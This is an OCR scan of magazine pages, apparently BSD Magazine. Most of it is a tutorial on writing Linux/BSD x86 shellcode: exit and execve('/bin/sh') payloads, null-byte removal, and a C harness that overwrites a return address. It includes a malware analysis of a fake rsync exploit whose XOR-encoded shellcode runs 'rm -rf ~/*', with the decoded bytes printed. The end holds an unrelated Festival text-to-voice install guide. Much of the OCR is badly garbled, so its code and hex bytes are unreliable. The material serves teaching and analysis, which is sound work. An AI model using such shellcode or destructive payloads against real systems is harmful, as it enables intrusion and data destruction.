open ("/etc/ld.so.cache", O RDONLY) aes 

PStatoe( sce Wede—S eUEREG 0644 stesize—o0470 a. |) 
= 0 

old innitape (NUM 604207 FROM READ MAP OER EVADE, 655.0) .— 
0x40018000 

close (3) = 0 

decess("/ctuc, id so.nohweap' ;, 2.0K) = -] ENOENT 


(No such file or directory) 


open (7th libeaco.s )  OuRDONT:) as 
teoad ye Ee eer OO OO ONO ONO NOS OO nO. 
ON ONCOL. ees be 
PS tava oe Se elode— > MERte Gta ses tze— i 245007, 
aka 


eld nmap (NULL, 1253956, “FROE READ| PROD BxEC) MAP 
PRIVATE, 3, 0) = 0x40027000 


PRIVATE |MAP FIXED, 3, 0x127000) = 
0x4014£000 

old_mmap(0x40157000, 8772, PROT READ|PROT WRITE, MAP_ 
PRIVATE |MAP_FIXED|MAP_ ANONYMOUS, 
-1, 0) = 0x40157000 


close (3) = 0 
munmap (0x40018000, 60420) = 0 
Sexe (0) =e 
S 


Listing 9. Verifiyng the shellcode 


S hasm —£ exitZ-asm 


>» Obs Gune =d ex1t2 6 





old_mmap(0x4014£000, 32768, PROT READ|PROT WRITE, MAP_ 


exit, 20 file format elf32-1386 


Disassembly of section .text: 


00000000 <.text>: 


0: sul ele xOG Sebx, sebx 
ee bo On mov SOs aL 
A: eer a0 a iiee S0x80 


Listing 10. The binary built from the previous exit.c listing 
and opened with gdb 


S db ly Cxie 

GNU gdb 6.1-debian 

Copyright 2004 Free Software Foundation, Inc. 

GDB is free software, covered by the GNU General 
Public License, and you are 

welcome to change it and/or distribute copies of it 
under certain conditions. 

Type "show copying" to see the conditions. 

There 1s absolutely no warranty for GDB. Type "show 
warranty" for details. 

Lite. GDE was -eontigqused as “'13so—-linux! 3. Using) hose 
libthread db library "/lib/ 
Tibi hvedd dbs sols. 


(gdb) break main 
Breakpoint 1 at 0x804836a 
(gdb) run 


Starting pProdram. o/ tamaisk) var, time excat 


Breakpoint 1, 0x0804836a in main () 

(gel) Salsas ® Bexar 

DUMP Obwassenbler code fer finciion ex1e- 
Ox200ced Jes sexteil: mov 0x4 (sesp) , sebx 
Ox400ceda0 = <sexrs4 mov SOxfc, seax 

Ox A200 Cedas et. alone $0x80 
0x400ceda7 <_exit+11>: mov SO0x1, %eax 
0x400cedac <_exit+16>: int $0x80 

UA Uieedde ne ete ele 





Ox400cedak <se cre o>: Tice 
End of assembler dump. 


(gdb) 
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exit.c 
main () { 


exit (0); 


We only have to compile it: 
> GCC =O exit exit.c 


and disassemble it with cav (http://www.gnu.org/ 
software/gdb/) to make sure it executes. the 
system call and see how it works under the hood: 
see Listing 3. 

The last instruction in main) Is the call to the exit 3) 
function. We will now see that exit (3), in turn, calls the 
_exit (2) function which will finally execute the system call, 
including the 0x80 interrupt: see Listing 4. 

Therefore, a shellcode using the libc to indirectly 
execute the exit(2) system call looks like: 


push dword 0 ; Status 
call 0x8048284 ; Call the libc exit() function 
(address obtained 
; from the above disassembly) 
add esp, 4 ; Clean up the stack 
*BSD system calls 


In the *BSD family, direct system calls (i.e. through the 
Ox80 interrupt) are slightly different than in Linux, while 
there's no difference in indirect system calls (i.e. using the 
libc functions addresses). 

The numbers of the syscalls are listed in the /usr 
/src/sys/kern/syscalls.master file, which also contains the 
prototypes of the syscall functions. Here are the first lines 
of the file on OpenBSD: see Listing 5. 

The first column contains the system call number, 
the second contains the type of the system call and the 
third the prototype of the function. Unlike Linux, *BSD 
system calls don't use the fastcall convention (i.e. passing 





Listing 11. Spawning a shell 


man 2 execve 
EXECVE (2) Linux Programmer's Manual 


EXECVE (2) 


NAME 


execve - execute program 


SYNOPSIS 
#include <unistd.h> 
int execve(const char *filename, char *const 
acgv il, cian scons © vonve li); 
DESCRIPTION 
execve() executes the program pointed to by 
filename. filename must be 
either a binary executable, or a script 
SEarUImg with a lime Or tne form 
"#! interpreter [arg]". In the latter case, 
the interpreter must be a 
valid pathname for an executable which is not 
DESeliva seripy, when wi bil be 
invoked as interpreter [arg] filename. 
argv 1S aml atray Of argumenk Strings passed to 
the new program. envp iS an 


array Of Strings, conventionally of the form 





key=value, which are passed 
as environment to the new program. Both, argv 
and envp must be terminated by 
a null, (eointer: The argument vector and 
environment can be accessed by 
the -callled programs Main fUncr1 on, when i as 
defined as int main(int argc, 


char “argv ly char “env lle 


Listing 12. The overall structure of the shellcode 


JME SHO hE mycakl ; Immediately Jump to the call 


TistcuCchLon 


shellcode: 
pop esi ; Store the address of "/bin/sh" 
in Bod 
eel 
mycall: 
call shellcode , Push the address of the next 
byte onto the stack: the next 
db ody sae ; byte is the beginning of the 


Sieincper 7 eam olin 
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arguments in registers), but use the C calling convention 
instead, pushing arguments on the stack. Arguments are 
pushed in reverse order (from right to left), so that they are 
extracted in the correct order by the function. Immediately 
after the system call returns, the stack needs to be cleaned 
up by adding to the stack pointer (ese) a number equal to 
the size, in bytes, of the arguments (to put it simply, you 
have to add the number of arguments multiplied by 4). 

The role of the zax register, instead, remains the same: 
it must contain the syscall number and will eventually 
contain the return value. Therefore, to recap, executing 
a system call requires four steps: 


¢ storing the syscall number in zax; 

¢ pushing (in reverse order) the arguments on the 
stack; 

¢ executing the 0x80 software interrupt; 

¢ cleaning up the stack. 


The previous example for Linux, now becomes on *BSD: 


exit BSD.asm 
mov eax, l ; Syscall number 


push dword 0 ; rval 


push eax ; Push one more dword (see below) 
int 0x80 ; Ox80 interrupt 
add esp, 8 ; Clean up the stack 


As you can see, before executing the software interrupt, 
you need to push one extra dword on the stack (any 
dword will do); for an in-depth discussion on this topic, 
please refer to [FreeBSD]  (htto:/www.int80h.org/ 
bsdasm/#default-calling-convention). 


Writing the shellcode 
The next examples refer to Linux, but can be easily 
adapted to the *BSD world. 
So far, we have seen how to execute simple commands 
using system calls. To obtain our shellcode, now, we only 
have to get the opcodes corresponding to the assembler 
instructions. There are typically three methods to get the 
opcodes: 
¢ writing them manually in hex Intel® 
dcoumentation at hand!), 

¢ writing the assembly code and then extracting the 
opcodes, 

¢ writing the C code and disassebling it. 


(with the 





Listing 13. Resulting assenbly code 


Get eve adem 


[esi + 8], eS1 . 


mov dword 


mov dword [esi + 12], eax : 








jmp Shore mycall , Immediately jump to the call instruction 
shellcode: 

pop esi > Store the address Ob "/bin/sh” ain ESt 

MO eax, eax ; Zero out EAX 

mov byte [esi + 7), al ; Write the null byte at the end of the string 


[ESI+8], 1.e. the memory immediately below the string 
: "/oin/sh", will Contain the array pointed to by the 
; second argument of execve(2); therefore we store in 


: [Esite|- the address or the string: 


...and in [BSiI+12])| the NULL pointer (BAX is Q) 
mov eles SO so ; store the number of the syscall (11) am BAX 
lea ebx, [esi] ; Copy the address of the string in EBX 
lea ecx, [esi + 8] ; Second argument to execve (2) 
lea edx, [esi + 12] ; Third argument to execve(2) (NULL pointer) 
int 0x80 ; Execute the system call 

mycall: 
Cem shellcode , Pus thewaddress on -"/bimssh Sonkourne Stack 
db Wy dlowiay ila 
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| don't think this is the right place to talk about 
ModRM and SIB bytes, memory addressing and so 
on. So we won't delve here into writing hand-crafted 
machine code; anyway, you can find all the information 
you want (and probably more) in [Intel] (hittp:// 
developer.intel.com/design/pentium4/manuals/index_ 
new.htm). So let's take a look now at the other two 
methods. 


In assembler 

The second method is by far the most efficent and 
widespread, though we will see that all methods lead to 
the same results. Our first step will be to use the assembly 
code from the previous exit.asm example to write 
a shellcode that, using the exit 2) syscall, will make the 
application exit cleanly. To get the opcodes, we will first 
assemble the code with nasn (http://nasm.sourceforge.net/ 
) and then disassemble the freshly built binary with 
objdump: see Listing 6. 

The second column contains the opcodes we need. 
Therefore, we can write our first shellcode and test it with 
a very simple C program borrowea from [Phrack] (http:// 
www. phrack.org/show.php ?p=49&a=14): see Listing 7. 


Though very popular, the above lines may not be that 
straightforward. Anyway, they simply overwrite the return 
address of the maini) function with the address of the 
shellcode, in order to execute the shellcode instructions 
upon exit from main ). After the first declaration, the stack 
will look like: 


¢ Return address <Return address (pushed by the cat 
instruction) to store in zre upon exit 

e Saved EBP <Saved zsp (to be restored upon exit from 
the function) 

¢ ret <First local variable of the main) function 


The second instruction increments the address of the ret 
variable by 8 bytes (2 dwords) to obtain the address of 
the return address, i.e. the pointer to the first instruction 
which will be executed upon exit from the main) function. 
Finally, the third instruction overwrites this address with 
the address of the shellcode. At this point, the program 
exits from the main i) function, restores zxse, stores the 
address of the shellcode in zie and executes it. 

To see all this in operation, we just have to compile sc_ 
exit.c and run tt: 





Listing 14. Extracting the opcodes 


So inevsil “as ele ejeic fslasiibcievi 
7 OvCuMp yr =eedeu soho. 


Getecwolino: ile EOmlar welt 37—1366 


Disassembly of section .text: 


00000000 <shellcode-0x2>: 


Q: eb 18 jmp lee my ealik 


OO000002 <shellcode>: 


Ze 5e pop SES1 

on Sic Og Seax, Seax 

a. 88 46 07 mov S6al,0x7 (%esi) 
Be Sor ie 0s mov sesi,0x8 (%es1) 
De 89 46 Uc mov seax, Oxc (%eS1) 
e: bO0 Ob mov S0xb, cal 

LG 8d le lea (Sesi) , sebx 

ae 8d 4e 08 lea 0x8 (esi) , SECX 
Se sol So VE lea Oxc (Sesi) , edx 
ES cd 80 mG $0x80 





OUOUCOta<myeall >: 





iva es ves ff fir rt call 2 <shellcode> 
ee a das 
Zr: 62 69 6e bound ‘%ebp, 0x6e (%ecx) 
Zaye Zale das 
24: ooo jae 8e 
<mycall+0x74> 
S 


Listing 15. /nserting opcodes them in the C program 


Gershel ire 
char shellcode[] = "\xeb\x18\x5e\x31\xc0\x88\x46\x07\ 
x89\x76\x08\x89\x46" 
"\x0c\xb0\x0b\x8d\xle\x8d\x4e\x08\ 
xGd\x56\x0e\xced\ x80" 
PNKES eS (xt hr xn xi t x28 \xo7 x69. 
MOG xr Ks xa! 
inte main() 
{ 
int. ~hets 
rev = (int “)ereu + 2; 
(*ret) = (int) shellcode; 
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$ gcc -o sc_exit sc exit.c really been our shellcode to make the program exit, we 
$ ./sc_exit can verify it with strace (http://www.sourceforge.net/ 
$ projects/strace/): see Listing 8. 


On the last line, you can notice our exit (2) system call. 
Let me guess: your mouth is not really wide open in Unfortunately, looking at the shellcode, we can notice 
amazement! Anyway, if we want to make sure it has alittle problem: it contains a lot of null bytes and, since the 





Listing 16. Disassembling with ndisasm 


S echo —ne "\xeb\x17\x5e\x89\x76\x08\ x31 \xc0\x88\x46\x07\x89\ x46 \x0C\x50\x0b\x89"\ 
Se Ns Veo xe OB xo EKG? (eed x80 es xed Kr hbk oom oo KOO oe” 
> NRZ EVR IS \xoe be" No ndisacm -u — 


QO0000000 EBI17 joe shore 0xi9 Pp Inte rel jUuMp iro. rhe Calm 

O0000002 5E pop esi ; Store the address of the string in 
7 idvepll 

00000003 897608 mov [esit+0x8],esi ; Write the address of the string in 
; Ee tetas 

00000006 31C0 xOor eax, eax ; Zero out EAX 

OO0O000008 884607 mov [esit+0Ox7],al ; Null-terminate the string 

OO0O00000B 89460C mov [esitOxc],eax ; Weite the nullepointer co BSi + IZ 

OOO0O0000K BOOB mov al,O0xb ; Number of the execve(2) syscall 

00000010 89F3 mov ebx,esi ; Store the address of the string in 


' EBX (first argument) 


00000012 8D4E08 lea ecx, [esit0x8] ; second argument (pointer to the 
: array) 
COCCOOES si D2 xor edx, edx 7p 2erO CUE) EDX {entre aroqumene) 
00000017 CD80 dm O>e30 ; Execute the syscall 
00000019 ES8E4FFFFFF Cala x2 y Push the address ot) Ene suring and 


7 jump to the second 


; imistr wer On 
OOO0001E 2F das a) oan ca 
OOOO0001F 62696E bound ebp, [ecxt+0x6e] 
O0CC0022 "22 das 
00000023 7368 pesca 
OOOCC02ZS > s3 pop eax 
S 


Listing 17. The less visible shellcode 


Leseen 

char shellcode2[] = 
"\ xeb\x10\x5e\x31\xc9\xb1l\x4b\xb0\xffi\x30\x06\xfe\xc8\x46\xe2\xi9" 
UNxebD\xX0 5S \xe8 \Xeb \Xit \xGE \xit xl \xdo\xia\xte\xto\xdo\x9b\ x91 \ x99" 
WV XGONK3'6 \x9e (xis xe x99 Vx \xe7 (xed xed (x9e\ x86 \xcayxcd \x9a xg” 
WV ECO 9D eb (xc \xc2 \xd3 \xde\xnli\ ba (xis \xaa x4 x04 eae x4 xb” 
UN XGIO\XB8 \ xe (x13 x87 \x5e \x3e\xel\ 9d x40) \ xO xoU \ x99 x44. x95 xen” 
UNOS Ae ah xa ko el 0 x OO ee oN exe 
UO Ses yar 

eae 
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shellcode is often written into a string buffer, those bytes 
will be treated as string terminators by the application and 
the attack will fail. There are two ways to get around this 
problem: 


¢ writing instructions that don't contain null bytes (not 
always possible), 

¢ writing a self-modifying shellcode (without null bytes) 
which will write the necessary null bytes (e.g. string 
terminators) at run-time. 


We will now apply the first method, while we _ will 
implement the second later. 


First, the first instruction (mov ebx, 0) can be replaced by 
the more common (for performance reasons): 


xor ebx, ebx 


The second instruction, instead, contained all those 
zeroes because we were using a 32 bit register (ax), 
thus making 0x01 become oxo1000000 (bytes are in reverse 
order because Intel® processors are little endian). 
Therefore, we can solve this problem simply using an 8 
bit register (at) instead of a 32 bit register: 


mov al, l 





Listing 18. Disassembling the shellcode 


VOOM: ieee? 
[peeked 


Pop. ss 


Listing 19. Decoding the shellcode using python 


decode.py 
#!/usr/bin/env python 





S echo =ne ™\xeb\x10\x5e\x31\xc9\xb1l\x4b\xb0\xtf\x30\x06\xfte\xce[...]" | \ 
> ones eysiil Wh = 
00000000 EB1O 7Mo shore OsclZ ; Jum to the CALL 
HOOOO COZ ~ Si pop esi ; Retrieve the address of byte 0x17 
VO00000227 =2169 xOr @CX,ECX eco Our Cx 
00000005 B14B mov cl,0x4b ; Setup the loop counter (see 
; imscenucetom Ox0) 
VO0C00C7 ~ BORE mov al-Uxit ; Setup the XOR mask 
OO0C0002. 2006 xor [esi] ,al ; XOR byte 0x17 with AL 
QOO00000B FEC8 dec al ; Decrease the XOR mask 
OOO00000D 46 inc esi ; Load the address of the next byte 
OOO0O0000E E2F9 lrooje es) ; Keep XORing until ECX=0 
00000010 EBO5 qe shore s0xt 7 ; Jump to the first XORed instruction 
00000012 ES8EBFFFFFF call 0x2 ; PUSH the address of the next byte and 


; jump to the second instruction 


sc = "\xeb\xl0\x5e\x31\xcO\xbl \x40\xb0\xff\x30\x06\xte \xc8 \x46\xe7\xio" 
UN eb x0 S (Kee \xeb (xi \xir \xre \xi] \xdb\xiG\ nie (xt \xda x 9b x91 90 
UN XGO) 3G xe ois xe x99 xr) xe ce) xed Je x00 “ca es) xJa xcs 
m\ RCO VRID (xc Keo \xe2\xd3 \xde\xrl \xbal\xbe \kaa \xr4 \xb4 \xac\xbD4 xb” =F 
UNKOGO\XEG  xe5 Vx UKe2 noe xed xe od x40 Ko xc x99 x44 0S xen | 
WNSCIS VXAic x2 Exe x KO I XE Xbox xe xa xO xee exile | 
LO <illay Wesio 

Print |  oqicimi(dichn (lord Ga (O0xti=n))) efor a tin enumerake (se: (Uxcli2q) |) 
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Now our assembly code looks like: To recap, we need to pass it three arguments: 
a pointer to the name of the program to execute (in 
our case a pointer to the string /pin/sh); 
a pointer to an array of strings to pass as arguments 
to the program (the first argument must be argviol, Le. 
the name of the program itself). The last element of 
the array must be a null pointer; 
¢ a pointer to an array of strings to pass as environment 
to the program. These strings are usually in the form 
key=value and the last element must be a null pointer. 


xor ebx, ebx . 
mov al, l 


int 0x80 . 


and the shellcode becomes: see Listing 9, which, as you 
can see, doesn't contain any null bytes! 


Inc 
Now let's take a look at the other technique to extract the 
opcodes: writing the program in C and disassembling 
it. Let's consider, for instance, the binary built from 
the previous exit.c listing and open it with gap (http:/ 
www.gnu.org/software/gdb/): see Listing 10. 

As you can see, the function actually 
executes two syscalls: first number 
Oxfc (252), exit group(2), and then 
number 1, The 


Therefore, spawning a shell from a C program looks like: 


get. shell. ¢ 


_exit (2) #include <unistd.h> 





Listing 20. Decoding the shellcode using python 


_SHie (255 See 


group (2) syscall is similar to exit(2) | $ ./decode.py | hexdump -C 

but has the purpose to terminate all | 00000000 e8 25 00 00 00 2f 62 69 Ge 2f 73 68 00 73 68 00 |?%.../bin/sh.sh. | 
threads in the current thread group. | 00000010 2d 63 00 72 6d 20 2d 72 66 20 Te 2f 2a 20 32 3e |-c.rm -rf ~/* 2>| 
Anyway, only the second syscall is | 00000020 2f 64 65 76 2f 6e 75 6c 6c 00 5d 31 cO 50 8d 5d |/dev/null.]1?P.] | 
required by our shellcode. So let's | 00000030 Oe 53 8d 5d 0b 53 8d 5d 08 53 89 eb 89 el 31 d2 |.S.].S.].S.&.a10| 
extract the opcodes with gab (http:// | 00000040 b0 0b cd 80 89 c3 31 c0 40 cd 80 eee eee 
www.gnu.org/software/gdb/): 0000004c 


(gdb) x/4bx exit 


Listing 21. Decoding the shellcode using python. Disassembling 


Ox400ced9c <_exit>: 0x8b Ox5c 
0x24 0x04 oe CECOUe. py a) Mel sacm 
(gdb) x/7bx exitt1l 00000000 825000000 call 0x2a 
Ox400ceda7 <_exitt+ll> VOOU000S Zr das 
0xb8 0x01 0x00 0x00 00000006 62696E bound ebp, [ecx+0x6e] 
0x00 Oxcd 0x80 00000009 2F das 
(gdb) O000000A 7368 jnc 0x74 
0000000C 007368 add [ebx+0x68],dh 
Once again, to make the shellcode | 0000000F 002D6300726D add [0x6d720063],ch 
work in real-world applications, we | 00000015 202D7266207£ and [0x7e206672],ch 
will need to remove all those null | oo00001B 2F das 
bytes! 0000001C 2a20 sub ah, [eax] 
OO000OLE 3238 xor col es a| 
Spawning a shell 00000020 2F das 
Now it's time to write a shellcode | 00000021 6465762F gs jna 0x54 
to do something a little more | 00000025 6z outsb 
useful. For instance, we can write | 00000026 756c jnz 0x94 
a shellcode to spawn a shell (/vin/ | 00000028 6c insb 
sh) and eventually exit cleanly. The | 00000029 005D31 add [ebp+0x31],bl 


simplest way to spawn a Shell is 


using the execvei2) syscall Let's 


take a look at its usage from its man 
page: see Listing 11. 
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int main() { 


In the above example we passed tO execve (2): 


char *args [2]; 


args 


args 


[O} = 
fil = 


execve(args[0], args, NULL); 


a pointer to the string /bin/sn; 


an array of two pointers (the first pointing to the string 


/bin/sh and the second null); 


a null pointer (we don't need any environment ° 


variables). 


HOW TO’S 


Now let's build it and see it work: 


s GCO =o: gét shell get. shell sc 


S$ ./get shell 
sh-2.05bS exit 
$ 


Ok, we got our shell! Now let's see how to use this 
system call in assembler (since there are only three 
arguments, we can use registers). We immediately have 


to tackle two problems: 


the first is a well-known problem: we can't insert null 


bytes in the shellcode; but this time we can't help 








Listing 22. The beginning of the shellcode could be re-written this way 


E825000000 


ZEOZO9GEZE / 36000 


736800 
2D6300 


726d202D/266207E2F2A20323E2F64657/62F6E7/56C6C00 


2)D) 
Peacod 


Listing 23. Examining the called function 


> ./ decode exp.py | cut =e 43-— | mdisacm =u — 
00000000 5D pop ebp 

OCU COCCI =Sikeo xOr e€ax,eax 
OOOCC00S 50 push eax 
00000004 8D5D0E lea ebx, [ebpt+0xe] 
OVO OOOO Ness push ebx 
00000008 8D5D0B lea ebx, [ebpt+0xb] 
Q000000B 53 push ebx 
QOO00000C 8D5D08 lea ebx, [ebpt0x8] 
QOOO0000F 53 push ebx 
00000010 89EB mov ebx,ebp 
00000012 89E1 mov ecx,esp 
00000014 31D2 xor edx, edx 
00000016 BOOB mov ell; 0xb 
00000018 CD80 mies 0x30 
QOOO0001A 89C3 mov ebx, eax 
OCOCCORe Se seo xor eax, eax 
QOOOOQ01E 40 inc eax 

QOOO00001F CD80 imc, 0x30 





Calley x zai 
dip ts 7" /bim/ sin” 
db ohiy 
db ee 


db "rm =re ~/* 2>/dev/null” 
pop ebp 


; Retrieve the address of the string 


"pany sh" 


> Zero out EAX 
; Push the null pointer onto the stack 
> Store the address of 


"xm =ri ~/* Je/dev/null” in Bex 


and push ar Om Ehe stack 


- Store the address of "-c" in EBX 


and push at Om the stack 


Store the aderess of “sh” an EBX 


and "PUSH ab On Ene Stack 


Seon une ACduoss lobe.) bin, cat sam 


EBX (first arg to execve() ) 


; store the stack Pointer CoO EEX (ESP 


DOmMuStiOr ol’ wl = er, wrtelMis wees) 


; Third arg to execve() 

> Number of the execve() syscall 

; Execute the syscall 

; Store 0xb in EBX (exit code=11) 

7 Ge cCOr eur aa 

; EAX=1 (number of the exit() syscall) 


; Execute the syscall 
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using them: for instance, 
the shellcode must contain 
the string /bin/sn and, in 
C, strings must be null- 
terminated. And we _ will 
even have to pass two 
null pointers among the 
arguments to execve (2)! 

¢ the second - problem 
is finding the address 
of the string. Absolute 
memory addressing makes 
development much longer 
and harder, but, above all, 
it makes almost impossible 
to port the shellcode 
among different programs 
and distributions. 


To solve the first problem, 
we will make our shellcode 
able to put the null bytes 
in the right places at run- 
time. To solve the second 
problem, instead, we 
will use relative memory 
addressing. 

The classic method to 
retrieve the address. of 
the shellcode is to begin 
with a caxz instruction. The 
first thing a caz1 instruction 
does is, in fact, pushing the 
address of the next byte 
onto the stack (to allow the 
RET instruction to insert this 
address in ere upon return 
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from the called function); then the execution jumps to the 
address specified by the parameter of the caxz instruction. 
This way we have obtained our starting point: the address 
of the first byte after the cazz is the last value on the 
stack and we can easily retrieve it with a Por instruction! 
Therefore, the overall structure of the shellcode will be: 
see Listing 12. 
Let's see what it does: 


first of all, the shellcode jumps to the caxz instruction; 
the cart pushes onto the stack the address of 
the string /pin/sn (not null-terminated yet); DB is 
a directive (not an instruction) that simply defines 
(i.e. reserves and initializes) a sequence of bytes; 
now the execution jumps back to the beginning of the 
shellcode; 

next, the address of the string is popped from the 
stack and stored in ESI. From now on, we will be able 
to refer to memory addresses with reference to the 
address of the string. 


Now we can fill the structure of the shellcode with 
something useful. Let's see, step by step, what it will 
have to do: 


zero out zax in order to have some null bytes 
available; 

terminate the string with a null byte, copying it from 
zax (we will use the az register); 

setup the array scx will have to point to; it will be made 
up of the address of the string and a null pointer. We 
will accomplish this by writing the address of the 
string (stored in zsz) in the first free bytes right below 
the string, followed by the null pointer (once again we 
will use the zeroes in zax); 

store the number of the syscall (OxOb) in sax; 
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¢ store the first argument to execve(2) (i.e. the address 
of the string, saved in zsz) in ex; 

¢ store the address of the array in scx (zs1+8); 

¢ store the address of the null pointer in epx (zs1+12); 

¢ execute the interrupt Ox80. 


This is the resulting assenbly code: see Listing 13. 
Now let's extract the opcodes: see Listing 14. 
insert them in the C program: see Listing 15. 
and test it: 


» GOO “OG Get shell ger shell.c 
S$ ./get shell 

sh-2.05bS exit 

S 


Shellcode analysis 

One last point that deserves attention is the importance of 
disassembling shellcodes, both to learn new techniques 
and to be sure about what they do before executing 
them. 


Trust is good... 

For instance, let's take a look at the shellcode from the 
exploit  (http:/www.securityfocus.com/bid/12268/info/), 
made available by Rafael San Miguel Carrasco, exploiting 
a local buffer overflow vulnerability of the Exim (http:// 
www.exim.org/) MTA (releases 4.40 through 4.43). 


static char shellcode[]= 

"\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\ 
xb0\x0b\x89" 

"\x£3\x8d\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\ 
x62\x69\x6e" 

WV E\ 7S 60 (X56: 


Let's disassemble it with naisasm; by now, we expect to 
see something familiar: see Listing 16. 


...but control is better 

It's always a good habit to examine a shellcode before 
executing it. For example, on the 28 May 2004, a prankster 
posted  (http:/www.seclists.org/lists/fulldisclosure/2004/ 
May/1395.html) on full-disclosure (http:/lists.netsys.com/ 
mailman/lstinfo/full-disclosure) what he asserted was 
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a public exploit for a rsync (http:/Avwww.samba.org/rsync/) 
vulnerability. However, the code was weird: after a first, 
well-commented shellcode, there was a second, less 
visible shellcode: see Listing 17. 

On top of that, after a brief look at the main i) of the 
exploit, it was easy to spot that the latter shellcode was 
executed locally: 


(long) funct = &shellcode2; 
Coes 


Funct. ():s 


Therefore, if we want to know what the shellcode actually 
does, we can do nothing but disassemble it: see Listing 
18. 

As you can see, it's a_ self-modifying shellcode: 
instructions from 0x17 to 0x17 + Ox4B are decoded at run- 
time by XORing them with the value of az (which is initially 
OxFF and then decreases at each loop iteration). Once 
decoded, instructions are executed (jmp short 0x17). SO 
let's try to understand which instructions will actually be 
executed. We can easily decode the shellcode using our 
beloved python (http:/www.python.org/): see Listing 19. 

hexdump Can already give us a first idea: see Listing 20. 

Mmmh... /bin/sh, sh -c rm -rf ~/* 2>/dev/null ... This 
doesn't look good... But let's disassemble it to be sure! 
(see Listing 21). 

The first instruction is a cauz, immediately followed by 
the strings displayed by hexdump. The beginning of the 
shellcode could be re-written this way: see Listing 22. 

Let's examine the called function, keeping only the 
opcodes starting at the instruction 0x2a (42): see Listing 
23. 

As you can see, it's an execve(2) syscall with the array 
sh, -c, rm -rf ~/* 2>/dev/null aS the second argument. 
Needless to repeat that you should always analyse 
a shellcode before executing it! 


DANIELE MAZZOCCHIO 


Latest version: http://www. kernel-panic.it/security/shellcode/ 
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How To Convert 


Text to Voice Using Festival and Lame in FreeBSD 


In 2007 | built a web-based IM/ Chat Service which was later 
launched as an iPhone web app. Making a long story short 
| retired the service in 2008 and that was that. 


What you will learn... 
¢ To have basic knowledge on iPhone applications 


based apps so decided to brush the dust off of old Bob 
Chatter code base. After tons of code rewriting and 
little sleep, Bob Chatter version 1.0.0 IM|Chat for WebOS 
devices was released. Release 1.0.1 of Bob Chatter 
includes a service which converts real-time chat instances 
into voice files. After realizing first hand there was little 
documentation regarding FreeBSD and voice technology, 
decided to write a tutorial where others could learn from. 
This tutorial will demonstrate how to install the latest 
version of Festival in FreebBSD and convert text to voice 
files. By reading this tutorial you will also save yourself 
24 hours worth of hard ache, useless web searching 
and loads of curse words... After installing the current 
FreeBSD port festivai-1.96 1 (2007) and as stated above 


n the summer of 2010 grew a bit bored of building search 


Terminal 
File Edit View Terminal Go Help 


ca /usr/home/dango/vox 


Pr 2.0.95-beta.tar.qz co Re" 
ex CMU.tar.gz rest 


oP kallpcl6k.tar oa 
veep rablpc 16k.tal QZ 


speech tools-2.0.95-beta.tar.gz 


2.0.95-beta.tar.aqz 


an ae, SLE X.tar. ora 
iomie# tar zxvf speech tools 





Figure 1. Downloading source packages into same directory 
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What you should know... 
¢ How to install the latest version of Festival in FreebBSD and co- 
nvert text to voice 


getting no where rather quickly, decided to download the 
latest festival-2.0.95-beta (2010) from source. 

This tutorial has been tested on both FreeBSD /7.2- 
RELEASE AND 8.0 RELEASE. 

Festival is a brilliant voice synthesizer developed at the 
University of Edinburgh Centre for Speech Technology 
Research. 


Required Festival Packages 


speech_tools-2.0.95-beta.tar.gz Edinburgh Speech Tools 
Library 


festival-2.0.95-beta.tar.gz Festival Speech Synthesis 


System source 


Lexicons based on various 
dictionaries 


festlex_POSLEX.tar.gz 
festlex_OALD.tar.gz 
festlex_CMU.tar.gz 


festvox_kallpc16k.tar.gz LPC diphone voice database 


files (Required) 


festvox_rablpc16k.tar.gz 
festvox_cmu_us_rms_cg.tar.gz 
festvox_cmu_us_slt_arctic_ 
hts.tar.gz 
festvox_cmu_us_awb_ 
cg.tar.gz 


Additional voice files (Optional) 


Before you begin installing Festival you will need to 


download the required packages. Note: All packages 


must be downloaded to the same directory, not doing 


so will render your installation unusable. In Figure 1, 
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t © eat 


secaiasl w=" If yeu wish te contribute 


File Edit View Terminal Go Help 


include irixaudio.ce 


: =- 
gcc -c -fno-implicit-templates -03 -Wall -DSUPPORT FREEBSD16 iP te BSD mafaZzZine, share 
Myton atte meee . -™» « 
gcc - -fno-implicit-templates -03 -Wall -DSUPPORT FREEBSD16 -I.. your knowledge and skilis 
i tee Mele ee ie ee: Pe 
macosxaudio.cc:227:7: warning: no newline at end of file with other BSD users —= 


gcc -c -fno-implicit-templates -03 -Wall -DSUPPORT FREEBSD16 - 
include Linux Ese ao net hesitate A read 


Linux sound.cc:68: warning: deprecated conversion from string con 


tant to ‘char*' : : 
Linux sound.cc:866: error: redefinition of ‘int freebsd16 support the guLt a e 1 ime Ss eon Cour 
rT 


Linux sound.cc:66: error: ‘int freebsd16 supported’ previously de webs TL t ce and emai 1 us 


ined here 


Linux sound.cc:867: error: redefinition of ‘int Linuxl6 supported La + t =: 1 
©:67: error: ‘int Linuxl6 supported’ previously defi your i ea -or an ar LC e. 


Linux sound.cc:6) 
ed here 
Linux sound.cc:68: warning: ‘aud sys_name’ defined but not used 
ene zi 

all packages are downloaded to directory vox (usr/nome/ 

dango/vox). Once all files have been downloaded you can 

begin to decompress. u 

Festival installation f 
After downloading the required packages it is time to te am | 
install. Note: Since the only feature of Festival needed , & 
for our system was the text2wave to work, | did no testing 
on Festival capabilities with sound cards. Note: You must 


homie# 
compile speech_too/s before any other source. Become B SD magaz ine 


tar Zxvi speech tools=2.0.95-beta.tar.9z 


cd speech tools Author or Betatester 


./configure 





Figure 2. /nstallation errors using during compiling 


gmake 


During gmake, errors depicted in screenshot (Figure 2) will As a betatester you can 
occur without making the changes addressed in (Figure 3). aecide on the contents and 


Once speech tools have successfully compiled follow by , 1 

compiling the festival source. the form of our | quarterly. 
_ oo It can be you who read 

File Edit View Terminal Go Help aan : aa the articles before 

#ifdef SUPPORT FREEBSD16 everybody else and suggest 


Ren ee eget 
#include <fcntl.h> | | 
EE hai aerate de a me the changes to the author. 
inuxl6 supported ALSE: 
Wee ie iss ‘FreeBso": 


//static char “aud sy 
#endit /*SUPPORT FREEBSD16 */ 


#ifdeft SUPPORT VOXWARE 


SUG eh ee ee =e 

#include See Contact Us: 

#include <sys/types.h> =f 

#include <sys/stat.h> ‘t b a. 

#include parr eat ors@i 5S mae. org 
Pea pee wah Ok Mel elsletmacts PRUE : 


mie ete creates www .bsdmag.org 


//S5Tatic char *aud SyY5 name = 
static int stereo only = 0; 





press Escape (*“|) Tor menu 


Figure 3. Commenting out unneeded lines 66-68 and 78-80 


“ey 


